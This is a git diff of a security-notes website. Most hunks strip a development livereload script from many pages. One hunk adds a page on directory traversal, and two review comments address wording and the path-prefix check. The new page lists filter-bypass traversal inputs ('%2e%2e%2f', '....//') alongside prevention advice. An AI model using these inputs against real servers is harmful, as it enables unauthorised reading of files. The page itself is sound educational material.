- - diff --git a/docs/Cyberclopaedia/index.html b/docs/Cyberclopaedia/index.html index 63e6d75b..4a036baf 100644 --- a/docs/Cyberclopaedia/index.html +++ b/docs/Cyberclopaedia/index.html @@ -100,7 +100,7 @@ @@ -186,22 +186,6 @@

The Cyberclopaedia

- - diff --git a/docs/Exploitation/Binary Exploitation/Heap Exploitation/Use After Free (UAF).html b/docs/Exploitation/Binary Exploitation/Heap Exploitation/Use After Free (UAF).html index 12a8fb0a..e327917e 100644 --- a/docs/Exploitation/Binary Exploitation/Heap Exploitation/Use After Free (UAF).html +++ b/docs/Exploitation/Binary Exploitation/Heap Exploitation/Use After Free (UAF).html @@ -100,7 +100,7 @@ @@ -269,22 +269,6 @@

Example

- - diff --git a/docs/Exploitation/Binary Exploitation/Heap Exploitation/index.html b/docs/Exploitation/Binary Exploitation/Heap Exploitation/index.html index fa09a2b8..b6622eaa 100644 --- a/docs/Exploitation/Binary Exploitation/Heap Exploitation/index.html +++ b/docs/Exploitation/Binary Exploitation/Heap Exploitation/index.html @@ -100,7 +100,7 @@ @@ -178,22 +178,6 @@

Heap Expl - - diff --git a/docs/Exploitation/Binary Exploitation/Stack Exploitation/Buffer Overflows.html b/docs/Exploitation/Binary Exploitation/Stack Exploitation/Buffer Overflows.html index e0109d00..5b83f8ef 100644 --- a/docs/Exploitation/Binary Exploitation/Stack Exploitation/Buffer Overflows.html +++ b/docs/Exploitation/Binary Exploitation/Stack Exploitation/Buffer Overflows.html @@ -100,7 +100,7 @@ @@ -218,22 +218,6 @@

Shellcode - - diff --git a/docs/Exploitation/Binary Exploitation/Stack Exploitation/Format String Vulnerabilities.html b/docs/Exploitation/Binary Exploitation/Stack Exploitation/Format String Vulnerabilities.html index a1aedad8..2844d94f 100644 --- a/docs/Exploitation/Binary Exploitation/Stack Exploitation/Format String Vulnerabilities.html +++ b/docs/Exploitation/Binary Exploitation/Stack Exploitation/Format String Vulnerabilities.html @@ -100,7 +100,7 @@ @@ -303,22 +303,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Exploitation/Binary Exploitation/Stack Exploitation/Protection Mechanisms.html b/docs/Exploitation/Binary Exploitation/Stack Exploitation/Protection Mechanisms.html index a2aa62b5..4d7be70b 100644 --- a/docs/Exploitation/Binary Exploitation/Stack Exploitation/Protection Mechanisms.html +++ b/docs/Exploitation/Binary Exploitation/Stack Exploitation/Protection Mechanisms.html @@ -100,7 +100,7 @@ @@ -239,22 +239,6 @@
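Review bot: the same `__livereload` WebSocket snippet is deleted from every regenerated page in this commit, which is the right outcome for published docs, but the source of the change should be the site generator's configuration (dev-server/livereload disabled for production builds), not the HTML under docs/; otherwise the next build reintroduces the snippet. Please confirm in the commit message which generator setting changed.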

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Exploitation/Binary Exploitation/Stack Exploitation/Return to _dl_resolve.html b/docs/Exploitation/Binary Exploitation/Stack Exploitation/Return to _dl_resolve.html index 336a9d57..bdd5989f 100644 --- a/docs/Exploitation/Binary Exploitation/Stack Exploitation/Return to _dl_resolve.html +++ b/docs/Exploitation/Binary Exploitation/Stack Exploitation/Return to _dl_resolve.html @@ -100,7 +100,7 @@ @@ -265,22 +265,6 @@

Exploitation - - diff --git a/docs/Exploitation/Binary Exploitation/Stack Exploitation/Return-oriented programming (ROP).html b/docs/Exploitation/Binary Exploitation/Stack Exploitation/Return-oriented programming (ROP).html index b6f479a8..5c6e837d 100644 --- a/docs/Exploitation/Binary Exploitation/Stack Exploitation/Return-oriented programming (ROP).html +++ b/docs/Exploitation/Binary Exploitation/Stack Exploitation/Return-oriented programming (ROP).html @@ -100,7 +100,7 @@ @@ -270,22 +270,6 @@

The Exploit

- - diff --git a/docs/Exploitation/Binary Exploitation/Stack Exploitation/Sigreturn-oriented Programming (SROP).html b/docs/Exploitation/Binary Exploitation/Stack Exploitation/Sigreturn-oriented Programming (SROP).html index 70e8c677..7423cad4 100644 --- a/docs/Exploitation/Binary Exploitation/Stack Exploitation/Sigreturn-oriented Programming (SROP).html +++ b/docs/Exploitation/Binary Exploitation/Stack Exploitation/Sigreturn-oriented Programming (SROP).html @@ -100,7 +100,7 @@ @@ -257,22 +257,6 @@

The Exploit

- - diff --git a/docs/Exploitation/Binary Exploitation/Stack Exploitation/index.html b/docs/Exploitation/Binary Exploitation/Stack Exploitation/index.html index 4e6710ee..a2ba04d8 100644 --- a/docs/Exploitation/Binary Exploitation/Stack Exploitation/index.html +++ b/docs/Exploitation/Binary Exploitation/Stack Exploitation/index.html @@ -100,7 +100,7 @@ @@ -176,22 +176,6 @@

Stack E - - diff --git a/docs/Exploitation/Binary Exploitation/index.html b/docs/Exploitation/Binary Exploitation/index.html index 0371ad76..d597412a 100644 --- a/docs/Exploitation/Binary Exploitation/index.html +++ b/docs/Exploitation/Binary Exploitation/index.html @@ -100,7 +100,7 @@ @@ -175,22 +175,6 @@

Binar - - diff --git a/docs/Exploitation/DNS/DNS Cache Poisoning.html b/docs/Exploitation/DNS/DNS Cache Poisoning.html index d3ab7274..150058f5 100644 --- a/docs/Exploitation/DNS/DNS Cache Poisoning.html +++ b/docs/Exploitation/DNS/DNS Cache Poisoning.html @@ -100,7 +100,7 @@ @@ -178,22 +178,6 @@

Introduction - - diff --git a/docs/Exploitation/DNS/DNS Traffic Amplification.html b/docs/Exploitation/DNS/DNS Traffic Amplification.html index 75e153de..f08e795f 100644 --- a/docs/Exploitation/DNS/DNS Traffic Amplification.html +++ b/docs/Exploitation/DNS/DNS Traffic Amplification.html @@ -100,7 +100,7 @@ @@ -221,22 +221,6 @@

Exe - - diff --git a/docs/Exploitation/DNS/index.html b/docs/Exploitation/DNS/index.html index 459ec8cc..37e999c9 100644 --- a/docs/Exploitation/DNS/index.html +++ b/docs/Exploitation/DNS/index.html @@ -100,7 +100,7 @@ @@ -175,22 +175,6 @@

DNS

- - diff --git a/docs/Exploitation/Web/CRLF Injection.html b/docs/Exploitation/Web/CRLF Injection.html index b23f4207..f46ee9e2 100644 --- a/docs/Exploitation/Web/CRLF Injection.html +++ b/docs/Exploitation/Web/CRLF Injection.html @@ -100,7 +100,7 @@ @@ -178,22 +178,6 @@

Overview

- - diff --git a/docs/Exploitation/Web/Cross-Site Request Forgery.html b/docs/Exploitation/Web/Cross-Site Request Forgery.html index ef62fc79..0e239613 100644 --- a/docs/Exploitation/Web/Cross-Site Request Forgery.html +++ b/docs/Exploitation/Web/Cross-Site Request Forgery.html @@ -100,7 +100,7 @@ @@ -216,22 +216,6 @@

Hunting for X - - diff --git a/docs/Exploitation/Web/Directory Traversal.html b/docs/Exploitation/Web/Directory Traversal.html new file mode 100644 index 00000000..596b50cb --- /dev/null +++ b/docs/Exploitation/Web/Directory Traversal.html @@ -0,0 +1,208 @@ + + + + + + Directory Traversal - The Cyberclopaedia + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ +
+ + + + + + + + +
+
+ +

Directory Traversal

+

A directory traversal (also known as path traversal) is a type of attack which allows an adversary to access files outside the web root directory and usually occurs when there is no proper user input sanitisation.

+

If an application is vulnerable to path traversal, then one can abuse relative paths to escape from the web root and access arbitrary files on the file system.

+

+

One should look for directory traversals anywhere that they see a filename - this can be in a URL parameter, in the URL path itself or in any additional resources that the application loads.

+

Filter Bypass

+

URL encoding can be used to bypass many filters which try to filter out the ../ sequence from user input because they literally look for this specific characters and not their URL representations. The URL encoding of the . character is %2e and the / character gets encoded to %2f. The whole sequence can therefore be represented as %2e%2e%2f.

+

Some filters try to strip out the ../ sequence before handling requests. Oftentimes, however, these filters are non-recursive and only check the input once. Since the filter only goes over the string once and does not check the resulting string as well, the sequence ....// will be changed to ../ after the middle ../ is removed.

+

Prevention

+

One should avoid passing user input to file system APIs entirely. If this is absolutely impossible to implement, then user input should be validated before processing. In the ideal case this should happen by comparing the input with a whitelist of permitted values. At the very least, one should verify that the user input contains only permitted characters such as alphanumeric ones.

+

After such validation, the user input should be appended to the base directory and the file system API should be used canonicalise the resulting path. Ultimately, one should verify that this canonical path begins with the base directory.

+ +
+
+ +
+ + +
+ + + + + + + + + + + + + + + + + + + + diff --git a/docs/Exploitation/Web/HTTP Parameter Pollution.html b/docs/Exploitation/Web/HTTP Parameter Pollution.html index 52c57d25..07ab052d 100644 --- a/docs/Exploitation/Web/HTTP Parameter Pollution.html +++ b/docs/Exploitation/Web/HTTP Parameter Pollution.html @@ -100,7 +100,7 @@ @@ -232,22 +232,6 @@
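Review bot: the new Directory Traversal.html carries two wording defects from its Markdown source, in the Filter Bypass and Prevention paragraphs: "they literally look for this specific characters" should read "these specific characters", and "the file system API should be used canonicalise the resulting path" is missing "to" ("should be used to canonicalise"). Since docs/ is build output, fix both in Notes/Exploitation/Web/Directory Traversal.md and regenerate rather than patching the HTML. The Prevention paragraph's final check would also benefit from one extra sentence: the prefix comparison must be made against the base directory with a trailing path separator appended, otherwise a sibling directory whose name merely starts with the base (e.g. base `/var/www/html` and resolved `/var/www/html-old/...`) passes the check.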

Client-Side H - - diff --git a/docs/Exploitation/Web/HTTP Response Splitting.html b/docs/Exploitation/Web/HTTP Response Splitting.html index 47de5451..b0d0dfc4 100644 --- a/docs/Exploitation/Web/HTTP Response Splitting.html +++ b/docs/Exploitation/Web/HTTP Response Splitting.html @@ -100,7 +100,7 @@ @@ -184,22 +184,6 @@

Introduction - - diff --git a/docs/Exploitation/Web/Host Header Injection.html b/docs/Exploitation/Web/Host Header Injection.html index c815c6e0..4ee7cf70 100644 --- a/docs/Exploitation/Web/Host Header Injection.html +++ b/docs/Exploitation/Web/Host Header Injection.html @@ -100,7 +100,7 @@ @@ -200,22 +200,6 @@

Prevention

- - diff --git a/docs/Exploitation/Web/Open Redirect.html b/docs/Exploitation/Web/Open Redirect.html index 0c9ed371..b9e53304 100644 --- a/docs/Exploitation/Web/Open Redirect.html +++ b/docs/Exploitation/Web/Open Redirect.html @@ -100,7 +100,7 @@ @@ -197,22 +197,6 @@

Javas - - diff --git a/docs/Exploitation/Web/PHP Object Injection.html b/docs/Exploitation/Web/PHP Object Injection.html index 4f363e27..f1824ad3 100644 --- a/docs/Exploitation/Web/PHP Object Injection.html +++ b/docs/Exploitation/Web/PHP Object Injection.html @@ -100,7 +100,7 @@ @@ -306,22 +306,6 @@

Prevention

- - diff --git a/docs/Exploitation/Web/Resources/Images/Directory Traversal/Basic Directory Traversal.png b/docs/Exploitation/Web/Resources/Images/Directory Traversal/Basic Directory Traversal.png new file mode 100644 index 00000000..8cd2889e Binary files /dev/null and b/docs/Exploitation/Web/Resources/Images/Directory Traversal/Basic Directory Traversal.png differ diff --git a/docs/Exploitation/Web/SQL Injection/Cheatsheets.html b/docs/Exploitation/Web/SQL Injection/Cheatsheets.html index afaecb40..b54f1c6f 100644 --- a/docs/Exploitation/Web/SQL Injection/Cheatsheets.html +++ b/docs/Exploitation/Web/SQL Injection/Cheatsheets.html @@ -100,7 +100,7 @@ @@ -223,22 +223,6 @@

DNS Lookups

- - diff --git a/docs/Exploitation/Web/SQL Injection/Defences.html b/docs/Exploitation/Web/SQL Injection/Defences.html index 8bc8609d..82a36908 100644 --- a/docs/Exploitation/Web/SQL Injection/Defences.html +++ b/docs/Exploitation/Web/SQL Injection/Defences.html @@ -100,7 +100,7 @@ @@ -195,22 +195,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Exploitation/Web/SQL Injection/Finding SQLi.html b/docs/Exploitation/Web/SQL Injection/Finding SQLi.html index e662eae6..4742b7f2 100644 --- a/docs/Exploitation/Web/SQL Injection/Finding SQLi.html +++ b/docs/Exploitation/Web/SQL Injection/Finding SQLi.html @@ -100,7 +100,7 @@ @@ -176,22 +176,6 @@

Introduction - - diff --git a/docs/Exploitation/Web/SQL Injection/Introduction.html b/docs/Exploitation/Web/SQL Injection/Introduction.html index c54cc560..4f4f02a6 100644 --- a/docs/Exploitation/Web/SQL Injection/Introduction.html +++ b/docs/Exploitation/Web/SQL Injection/Introduction.html @@ -100,7 +100,7 @@ @@ -208,22 +208,6 @@

Types of SQLi - - diff --git a/docs/Exploitation/Web/SQL Injection/Union injections.html b/docs/Exploitation/Web/SQL Injection/Union injections.html index f8a70d21..9ddce9a9 100644 --- a/docs/Exploitation/Web/SQL Injection/Union injections.html +++ b/docs/Exploitation/Web/SQL Injection/Union injections.html @@ -100,7 +100,7 @@ @@ -200,22 +200,6 @@

- - diff --git a/docs/Exploitation/Web/SQL Injection/index.html b/docs/Exploitation/Web/SQL Injection/index.html index 18a7ce0e..08ea9aa6 100644 --- a/docs/Exploitation/Web/SQL Injection/index.html +++ b/docs/Exploitation/Web/SQL Injection/index.html @@ -100,7 +100,7 @@ @@ -175,22 +175,6 @@

SQL Injection - - diff --git a/docs/Exploitation/Web/Template Injection.html b/docs/Exploitation/Web/Template Injection.html index 39843152..ef2d51c8 100644 --- a/docs/Exploitation/Web/Template Injection.html +++ b/docs/Exploitation/Web/Template Injection.html @@ -100,7 +100,7 @@ @@ -185,22 +185,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Exploitation/Web/WebSockets.html b/docs/Exploitation/Web/WebSockets.html index 5e8c2470..033264a9 100644 --- a/docs/Exploitation/Web/WebSockets.html +++ b/docs/Exploitation/Web/WebSockets.html @@ -100,7 +100,7 @@ @@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Exploitation/Web/index.html b/docs/Exploitation/Web/index.html index b4188309..fa369a25 100644 --- a/docs/Exploitation/Web/index.html +++ b/docs/Exploitation/Web/index.html @@ -100,7 +100,7 @@ @@ -175,22 +175,6 @@

Web

- - diff --git a/docs/Exploitation/Windows/SCF File Attacks.html b/docs/Exploitation/Windows/SCF File Attacks.html index a1b690d6..00b20fa9 100644 --- a/docs/Exploitation/Windows/SCF File Attacks.html +++ b/docs/Exploitation/Windows/SCF File Attacks.html @@ -100,7 +100,7 @@ @@ -178,22 +178,6 @@

The Attack

- - diff --git a/docs/Exploitation/Windows/index.html b/docs/Exploitation/Windows/index.html index 065ea449..e276c8c2 100644 --- a/docs/Exploitation/Windows/index.html +++ b/docs/Exploitation/Windows/index.html @@ -100,7 +100,7 @@ @@ -175,22 +175,6 @@

Windows

- - diff --git a/docs/Exploitation/index.html b/docs/Exploitation/index.html index 51c37e5c..35e78ae0 100644 --- a/docs/Exploitation/index.html +++ b/docs/Exploitation/index.html @@ -100,7 +100,7 @@ @@ -175,22 +175,6 @@

Exploitation - - diff --git a/docs/Hardware Hacking/Wireless Attacks/Deauth Attack.html b/docs/Hardware Hacking/Wireless Attacks/Deauth Attack.html index 90fb01c6..50c32c04 100644 --- a/docs/Hardware Hacking/Wireless Attacks/Deauth Attack.html +++ b/docs/Hardware Hacking/Wireless Attacks/Deauth Attack.html @@ -100,7 +100,7 @@ @@ -188,22 +188,6 @@

Introduction - - diff --git a/docs/Hardware Hacking/Wireless Attacks/Hacking WEP Networks.html b/docs/Hardware Hacking/Wireless Attacks/Hacking WEP Networks.html index 30ec8e37..32565795 100644 --- a/docs/Hardware Hacking/Wireless Attacks/Hacking WEP Networks.html +++ b/docs/Hardware Hacking/Wireless Attacks/Hacking WEP Networks.html @@ -100,7 +100,7 @@ @@ -234,22 +234,6 @@

Cracking th - - diff --git a/docs/Hardware Hacking/Wireless Attacks/Hacking WPA Networks.html b/docs/Hardware Hacking/Wireless Attacks/Hacking WPA Networks.html index 2fe51077..b41fff48 100644 --- a/docs/Hardware Hacking/Wireless Attacks/Hacking WPA Networks.html +++ b/docs/Hardware Hacking/Wireless Attacks/Hacking WPA Networks.html @@ -100,7 +100,7 @@ @@ -200,22 +200,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Hardware Hacking/Wireless Attacks/index.html b/docs/Hardware Hacking/Wireless Attacks/index.html index 9629cb62..12ca7649 100644 --- a/docs/Hardware Hacking/Wireless Attacks/index.html +++ b/docs/Hardware Hacking/Wireless Attacks/index.html @@ -100,7 +100,7 @@ @@ -263,22 +263,6 @@

- - diff --git a/docs/Hardware Hacking/index.html b/docs/Hardware Hacking/index.html index 35dd4f0a..e062c4fe 100644 --- a/docs/Hardware Hacking/index.html +++ b/docs/Hardware Hacking/index.html @@ -100,7 +100,7 @@ @@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Networking/Network Address Translation (NAT).html b/docs/Networking/Network Address Translation (NAT).html index 50525abb..68a8c9ef 100644 --- a/docs/Networking/Network Address Translation (NAT).html +++ b/docs/Networking/Network Address Translation (NAT).html @@ -100,7 +100,7 @@ @@ -175,22 +175,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Networking/Networks/index.html b/docs/Networking/Networks/index.html index 3bda6053..d8e71a24 100644 --- a/docs/Networking/Networks/index.html +++ b/docs/Networking/Networks/index.html @@ -100,7 +100,7 @@ @@ -178,22 +178,6 @@

Switch

- - diff --git a/docs/Networking/Protocols/Address Resolution Protocol (ARP).html b/docs/Networking/Protocols/Address Resolution Protocol (ARP).html index 79963099..75626fb7 100644 --- a/docs/Networking/Protocols/Address Resolution Protocol (ARP).html +++ b/docs/Networking/Protocols/Address Resolution Protocol (ARP).html @@ -100,7 +100,7 @@ @@ -222,22 +222,6 @@

ARP Caching

- - diff --git a/docs/Networking/Protocols/Domain Name System (DNS)/DNS Protocol.html b/docs/Networking/Protocols/Domain Name System (DNS)/DNS Protocol.html index 8fb6c865..51698824 100644 --- a/docs/Networking/Protocols/Domain Name System (DNS)/DNS Protocol.html +++ b/docs/Networking/Protocols/Domain Name System (DNS)/DNS Protocol.html @@ -100,7 +100,7 @@ @@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Networking/Protocols/Domain Name System (DNS)/The Domain Name System.html b/docs/Networking/Protocols/Domain Name System (DNS)/The Domain Name System.html index 3339b756..838d911d 100644 --- a/docs/Networking/Protocols/Domain Name System (DNS)/The Domain Name System.html +++ b/docs/Networking/Protocols/Domain Name System (DNS)/The Domain Name System.html @@ -100,7 +100,7 @@ @@ -203,22 +203,6 @@

DNS - - diff --git a/docs/Networking/Protocols/Domain Name System (DNS)/The in-addr.arpa Domain.html b/docs/Networking/Protocols/Domain Name System (DNS)/The in-addr.arpa Domain.html index 20ce7a9c..e91a32de 100644 --- a/docs/Networking/Protocols/Domain Name System (DNS)/The in-addr.arpa Domain.html +++ b/docs/Networking/Protocols/Domain Name System (DNS)/The in-addr.arpa Domain.html @@ -100,7 +100,7 @@ @@ -176,22 +176,6 @@

The Cyberclopaedia

- - diff --git a/docs/Networking/Protocols/Domain Name System (DNS)/index.html b/docs/Networking/Protocols/Domain Name System (DNS)/index.html index 2cb83328..fe77c40f 100644 --- a/docs/Networking/Protocols/Domain Name System (DNS)/index.html +++ b/docs/Networking/Protocols/Domain Name System (DNS)/index.html @@ -100,7 +100,7 @@ @@ -175,22 +175,6 @@

DNS

- - diff --git a/docs/Networking/Protocols/Ethernet (IEEE 802.3).html b/docs/Networking/Protocols/Ethernet (IEEE 802.3).html index ea2bec0a..4419e189 100644 --- a/docs/Networking/Protocols/Ethernet (IEEE 802.3).html +++ b/docs/Networking/Protocols/Ethernet (IEEE 802.3).html @@ -100,7 +100,7 @@ @@ -210,22 +210,6 @@

802.1 - - diff --git a/docs/Networking/Protocols/File Transfer Protocol (FTP).html b/docs/Networking/Protocols/File Transfer Protocol (FTP).html index 121fa0e3..17f7cafa 100644 --- a/docs/Networking/Protocols/File Transfer Protocol (FTP).html +++ b/docs/Networking/Protocols/File Transfer Protocol (FTP).html @@ -100,7 +100,7 @@ @@ -297,22 +297,6 @@

Replies

- - diff --git a/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Classful Addressing.html b/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Classful Addressing.html index 7b946825..7803ed51 100644 --- a/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Classful Addressing.html +++ b/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Classful Addressing.html @@ -100,7 +100,7 @@ @@ -212,22 +212,6 @@

Problems

- - diff --git a/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Classless Inter-Domain Routing (CIDR).html b/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Classless Inter-Domain Routing (CIDR).html index a0849a12..1b45b898 100644 --- a/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Classless Inter-Domain Routing (CIDR).html +++ b/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Classless Inter-Domain Routing (CIDR).html @@ -100,7 +100,7 @@ @@ -179,22 +179,6 @@

CIDR - - diff --git a/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/IPv4 Datagrams.html b/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/IPv4 Datagrams.html index c904d764..7d879c23 100644 --- a/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/IPv4 Datagrams.html +++ b/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/IPv4 Datagrams.html @@ -100,7 +100,7 @@ @@ -327,22 +327,6 @@

Datag - - diff --git a/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Subnetting.html b/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Subnetting.html index 775b8efe..bf3bce0a 100644 --- a/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Subnetting.html +++ b/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Subnetting.html @@ -100,7 +100,7 @@ @@ -203,22 +203,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/index.html b/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/index.html index d3b8816b..aac5ace7 100644 --- a/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/index.html +++ b/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/index.html @@ -100,7 +100,7 @@ @@ -191,22 +191,6 @@

IP Addres - - diff --git a/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v6 (IPv6).html b/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v6 (IPv6).html index b226ebf8..57a526f7 100644 --- a/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v6 (IPv6).html +++ b/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v6 (IPv6).html @@ -100,7 +100,7 @@ @@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Networking/Protocols/Internet Protocol (IP)/index.html b/docs/Networking/Protocols/Internet Protocol (IP)/index.html index 32e9da15..607e2662 100644 --- a/docs/Networking/Protocols/Internet Protocol (IP)/index.html +++ b/docs/Networking/Protocols/Internet Protocol (IP)/index.html @@ -100,7 +100,7 @@ @@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Networking/Protocols/Leightweight Directory Access Protocol (LDAP).html b/docs/Networking/Protocols/Leightweight Directory Access Protocol (LDAP).html index 9172653d..0e386ae6 100644 --- a/docs/Networking/Protocols/Leightweight Directory Access Protocol (LDAP).html +++ b/docs/Networking/Protocols/Leightweight Directory Access Protocol (LDAP).html @@ -100,7 +100,7 @@ @@ -247,22 +247,6 @@

Compari - - diff --git a/docs/Networking/Protocols/Network Time Protocol (NTP).html b/docs/Networking/Protocols/Network Time Protocol (NTP).html index d12a52ee..3521244e 100644 --- a/docs/Networking/Protocols/Network Time Protocol (NTP).html +++ b/docs/Networking/Protocols/Network Time Protocol (NTP).html @@ -100,7 +100,7 @@ @@ -193,22 +193,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Networking/Protocols/Server Message Block (SMB).html b/docs/Networking/Protocols/Server Message Block (SMB).html index 6c64b62f..c882fa57 100644 --- a/docs/Networking/Protocols/Server Message Block (SMB).html +++ b/docs/Networking/Protocols/Server Message Block (SMB).html @@ -100,7 +100,7 @@ @@ -175,22 +175,6 @@

The Cyberclopaedia

- - diff --git a/docs/Networking/Protocols/Simple Network Management Protocol (SNMP).html b/docs/Networking/Protocols/Simple Network Management Protocol (SNMP).html index bceab35a..141d97fe 100644 --- a/docs/Networking/Protocols/Simple Network Management Protocol (SNMP).html +++ b/docs/Networking/Protocols/Simple Network Management Protocol (SNMP).html @@ -100,7 +100,7 @@ @@ -201,22 +201,6 @@

Community - - diff --git a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Authentication & Association.html b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Authentication & Association.html index 35036852..8e24215c 100644 --- a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Authentication & Association.html +++ b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Authentication & Association.html @@ -100,7 +100,7 @@ @@ -213,22 +213,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Control Frames.html b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Control Frames.html index 97b3d69a..2ede4c96 100644 --- a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Control Frames.html +++ b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Control Frames.html @@ -100,7 +100,7 @@ @@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Data Frames.html b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Data Frames.html index 2209bb97..9cabcb33 100644 --- a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Data Frames.html +++ b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Data Frames.html @@ -100,7 +100,7 @@ @@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Encryption & Integrity.html b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Encryption & Integrity.html index 7c36fbda..d7b7bc27 100644 --- a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Encryption & Integrity.html +++ b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Encryption & Integrity.html @@ -100,7 +100,7 @@ @@ -199,22 +199,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Action Frames.html b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Action Frames.html index 4c1326f9..c9cff52b 100644 --- a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Action Frames.html +++ b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Action Frames.html @@ -100,7 +100,7 @@ @@ -174,22 +174,6 @@

